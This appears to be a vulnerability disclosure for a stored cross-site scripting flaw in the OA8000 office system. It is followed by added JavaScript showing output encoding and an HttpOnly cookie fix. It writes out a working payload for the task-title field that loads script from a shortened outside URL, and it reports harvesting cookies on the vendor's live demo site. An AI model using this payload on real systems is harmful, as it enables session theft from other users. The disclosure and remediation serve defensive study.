### Summary:
Stored XSS in an OA office system, demonstrated on the demo site
### Details:
### Proof of vulnerability:
Official site: http://www.oa8000.com/online.htm
[<img src="https://images.seebug.org/upload/201501/28112402fec432e2c74addad5ab71d7cde37323c.jpg" alt="1.jpg" width="600">](https://images.seebug.org/upload/201501/28112402fec432e2c74addad5ab71d7cde37323c.jpg)
Official demo site: http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa
[<img src="https://images.seebug.org/upload/201501/281124138fdcb4e225c5743bbbd015acb12aceab.jpg" alt="2.jpg" width="600">](https://images.seebug.org/upload/201501/281124138fdcb4e225c5743bbbd015acb12aceab.jpg)
Log in as a regular user, then go to Work Center -- Task Management -- New Task.
[<img src="https://images.seebug.org/upload/201501/281124559be689a32ee322ba1356ba0333ef7095.jpg" alt="1.jpg" width="600">](https://images.seebug.org/upload/201501/281124559be689a32ee322ba1356ba0333ef7095.jpg)
Enter the XSS code in the task title field: `/"><script src=http://is.gd/7NT8vJ></script>`
[<img src="https://images.seebug.org/upload/201501/281125239289fce6a6c0db3ebe3e0b328d88b234.jpg" alt="2.jpg" width="600">](https://images.seebug.org/upload/201501/281125239289fce6a6c0db3ebe3e0b328d88b234.jpg)
View the information we published: simply viewing the tasks is enough, there is no need to open the task details.
[<img src="https://images.seebug.org/upload/201501/28112548f4ddca6346a4b20e1f2b8f37cad8e1f9.jpg" alt="3.jpg" width="600">](https://images.seebug.org/upload/201501/28112548f4ddca6346a4b20e1f2b8f37cad8e1f9.jpg)
The cookie information was received successfully.
[<img src="https://images.seebug.org/upload/201501/2811262040e65c843d40b1b262b54dbd330d0e41.jpg" alt="4.jpg" width="600">](https://images.seebug.org/upload/201501/2811262040e65c843d40b1b262b54dbd330d0e41.jpg)
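The fix for the task-title field, as an added example that is not the OA product's code: a task-list row rendered with the stored title concatenated as-is, beside the same row with output encoding, checked against the title value from this report. The function names are hypothetical, and it is an assumption (suggested by the `">` prefix of the reported value) that the title is written into a double-quoted attribute as well as element text.

```javascript
// Added example: hypothetical task-list renderer, not the OA product's code.
// Assumption: the stored title is emitted into a double-quoted attribute and
// into element text, which is what the `">` prefix of the reported value implies.

// Title value exactly as reported on this page.
const reportedTitle = '/"><script src=http://is.gd/7NT8vJ></script>';

// Vulnerable form: the stored value is concatenated into markup unchanged.
function renderTaskRowUnsafe(title) {
  return '<tr><td><a href="#" title="' + title + '">' + title + '</a></td></tr>';
}

// Encode the characters that can end an attribute value or open a tag.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened form: encode at output time, in every place the value is written.
function renderTaskRowSafe(title) {
  const t = escapeHtml(title);
  return '<tr><td><a href="#" title="' + t + '">' + t + '</a></td></tr>';
}

// Rough count of opening tags of a given name in the generated markup.
function countOpenTags(html, name) {
  const re = new RegExp('<' + name + '[\\s>]', 'gi');
  return (html.match(re) || []).length;
}

// Regression check a list view can run against stored titles.
function checkRow(render, title) {
  const html = render(title);
  return { html, scripts: countOpenTags(html, 'script'), anchors: countOpenTags(html, 'a') };
}

console.log('unsafe:', checkRow(renderTaskRowUnsafe, reportedTitle).scripts, 'script tag(s)');
console.log('safe:  ', checkRow(renderTaskRowSafe, reportedTitle).scripts, 'script tag(s)');
```

Output encoding fixes the injection itself; setting the `HttpOnly` attribute on the session cookie additionally keeps that cookie out of reach of page scripts.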